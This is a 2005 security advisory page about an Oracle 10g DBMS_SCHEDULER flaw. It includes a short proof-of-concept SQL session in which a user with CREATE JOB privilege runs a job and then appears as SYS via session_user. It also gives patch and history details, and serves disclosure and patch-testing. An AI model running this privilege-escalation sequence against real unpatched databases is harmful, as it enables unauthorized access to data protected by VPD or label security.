Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Blog
Contact
People
Partner
Impressum
Sitemap
Search
DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Name
DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected
Oracle 10g
Severity
Medium Risk
Category
Switch Oracle Username to user SYS
Credit
Oracle Metalink Forum 633336.995
Exploit
Forum Entry removed by Oracle
Date
07 May 2005 (V 1.02)
VU#
176909
Details
The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.
Example
Connect as a user with CREATE job privilege
SQL> select user from dual;
USER
---------
JOBUSER
SQL> execute dbms_scheduler.run_job('ANY_JOB');
PL/SQL procedure successfully completed.
SQL> select user from dual;
USER
---------
SYS
SQL> select (sys_context('userenv','session_user')) from dual;
USER
---------
SYS
SQL> select (sys_context('userenv','current_user')) from dual;
USER
---------
JOBUSER
SQL> show user
USER is "jobuser"
Patch Information
Apply the patches for Oracle Critical Patch Update October 2005.
History
05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005
ゥ 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.